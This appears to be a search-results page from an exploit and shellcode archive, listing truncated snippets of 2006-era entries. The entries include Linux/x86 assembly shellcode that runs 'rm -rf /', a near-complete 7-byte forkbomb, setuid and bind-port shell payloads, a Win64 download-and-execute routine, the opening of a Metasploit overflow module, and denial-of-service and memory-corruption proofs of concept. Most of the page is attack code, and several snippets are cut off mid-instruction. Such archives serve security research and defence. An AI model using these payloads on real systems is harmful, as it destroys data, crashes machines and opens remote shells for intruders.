3386 matches found
linux/x86 execve(rm -rf /) shellcode 48 bytes
No description provided by source. / By Kris Katterjohn 8/31/2006 48 byte shellcode to execve"rm -rf /" for Linux/x86 section .text global start start: ; execve"/bin/rm", "/bin/rm", "-r", "-f", "/", NULL , NULL push byte 11 pop eax xor esi, esi push esi push byte 0x2f mov edi, esp push esi push...
linux/x86 set system time to 0 and exit 15 bytes
No description provided by source. / By Kris Katterjohn 11/14/2006 15 byte shellcode to set system time to 0 and exit. No real damage : exit code is the last 5 bytes 0x6a - 0x80 for Linux/x86 section .text global start start: ; stime0 push byte 25 pop eax xor ecx, ecx push ecx mov ebx, esp int 0x...
linux/x86 - execverm -rf / shellcode 45 bytes
linux/x86 execverm -rf / shellcode 45 bytes. Shellcode exploit for linx86 platform / By Kris Katterjohn 11/18/2006 45 byte shellcode to execve"rm -rf /" for Linux/x86 section .text global start start: ; execve"/bin/rm", "/bin/rm", "-r", "-f", "/", NULL , NULL push byte 11 pop eax cdq push edx pus...
linux/x86 forkbomb 7 bytes
Exploit for linux/x86 platform in category shellcode ========================== linux/x86 forkbomb 7 bytes ========================== / By Kris Katterjohn 8/29/2006 7 byte shellcode for a forkbomb section .text global start start: push byte 2 pop eax int 0x80 jmp short start / main char shellcode...
linux/x86 - execve/bin/sh 22 bytes
linux/x86 execve/bin/sh 22 bytes. Shellcode exploit for linx86 platform / revenge-execve.c, v1.0 2006/10/14 16:32 Yet another linux execve shellcode.. linux/x86 execve"/bin//sh/","/bin//sh",NULL shellcode http://www.0xcafebabe.it But this time it's 22 bytes We could start the shellcode with a mov...
linux/x86 execve(/bin/sh) 22 bytes
Exploit for linux/x86 platform in category shellcode ================================== linux/x86 execve/bin/sh 22 bytes ================================== / revenge-execve.c, v1.0 2006/10/14 16:32 Yet another linux execve shellcode.. linux/x86 execve"/bin//sh/","/bin//sh",NULL shellcode...
linux/x86 setuid(0) and /bin/sh execve() shellcode 30 bytes
No description provided by source. / $Id: setuid-linux.c,v 1.4 2004/06/02 12:22:30 raptor Exp $ setuid-linux.c - setuid/execve shellcode for Linux/x86 Copyright c 2004 Marco Ivaldi [email protected] Short fully-functional setuid0 and /bin/sh execve shellcode. / / setuid0 8049380: 6a 17 push...
linux/x86 execve() Diassembly Obfuscation Shellcode 32 bytes
No description provided by source. / execve shellcode with 'fuck up disasm' ability, 32 bytes long by BaCkSpAcE sinisa86atgmaildotcom BitByterz Labs 2006 http://www.bitbyterz.org ; ; shellcode.asm ; fupdisasm: db 0x68 ; opcode for PUSH DW instruction db 0xcd ; crypt+1, opcode for INT instruction ...
Aix execve /bin/sh 88 bytes
No description provided by source. / Aix execve of /bin/sh Georgi Guninski [email protected] / unsigned int code= 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c , 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 , 0x3c602f73 , 0x60636801 ...
Utility for generating HTTP/1.x requests for shellcodes
Utility for generating HTTP/1.x requests for shellcodes. Shellcode exploit for generator platform / genhttpreq.c, utility for generating HTTP/1.x requests for shellcodes SIZES: HTTP/1.0 header request size - 18 bytes+ HTTP/1.1 header request size - 26 bytes+ NOTE: The length of the selected HTTP...
win64 (URLDownloadToFileA) download and execute 218+ bytes
No description provided by source. ; ; dexec64.asm - 218+ bytes unoptimised ; ; Win64 asm code, download & execute file using URLDownloadToFileA moniker & WinExec ; ; tested on AMD64 running Windows x64 SP1 ; ; there probably are errors in the code, but this is more of an experimental source if...
eIQnetworks License Manager Remote Buffer Overflow Exploit (494)
No description provided by source. !/usr/bin/perl -w metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs package Msf::Exploit::EiQLicense494; use base "Msf::Exploit"; use strict; use Pex::Text; my $advanced = ; my $info = 'Name' = 'EIQ License Manager Overflow',...
linux/x86 - setuid/portbind shellcode 96 bytes
linux/x86 setuid/portbind shellcode 96 bytes. Shellcode exploit for linx86 platform / $Id: portbind-linux.c,v 1.4 2004/06/02 12:22:30 raptor Exp $ portbind-linux.c - setuid/portbind shellcode for Linux/x86 Copyright c 2003 Marco Ivaldi Simple portbind shellcode that bind's a setuid0 shell on port...
mspp-poc3.txt
/----------------------------------------------------------------------------------------- MS Power Point mem. corruption POC try to close this file ..... modifying some personal bytes :P :P :P thanks to "psycho" Tested against Power Point ' 03 -- naveed...
CVE-2006-3419
Tor before 0.1.1.20 uses OpenSSL pseudo-random bytes RANDpseudobytes instead of cryptographically strong RANDbytes, and seeds the entropy value at start-up with 160-bit chunks without reseeding, which makes it easier for attackers to conduct brute force guessing attacks...
DEBIAN-CVE-2006-3419
Tor before 0.1.1.20 uses OpenSSL pseudo-random bytes RANDpseudobytes instead of cryptographically strong RANDbytes, and seeds the entropy value at start-up with 160-bit chunks without reseeding, which makes it easier for attackers to conduct brute force guessing attacks...
CVE-2006-3419
Tor before 0.1.1.20 uses OpenSSL pseudo-random bytes RANDpseudobytes instead of cryptographically strong RANDbytes, and seeds the entropy value at start-up with 160-bit chunks without reseeding, which makes it easier for attackers to conduct brute force guessing attacks...
linux/x86 - portbind define your own port 84 bytes
linux/x86 portbind define your own port 84 bytes. Shellcode exploit for linx86 platform / Shellcode - portbind 84 bytes Copyright c 2002 Giuseppe Gottardi 'oveRet' All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the...
PunkBuster < 1.229 - WebTool Service Remote Buffer Overflow (Denial of Service) (PoC)
Luigi Auriemma Application: PunkBuster http://www.punkbuster.com Versions: PunkBuster for servers, versions minor than v1.229: America's Army = v1.228 Battlefield 1942 = v1.158 Battlefield 2 = v1.184 Battlefield Vietnam = v1.150 Call of Duty = v1.173 Call of Duty 2 = v1.108 DOOM 3 = v1.159 Enemy...
linux/x86 execve() Diassembly Obfuscation Shellcode 32 bytes
Exploit for linux/x86 platform in category shellcode ============================================================ linux/x86 execve Diassembly Obfuscation Shellcode 32 bytes ============================================================ / execve shellcode with 'fuck up disasm' ability, 32 bytes long...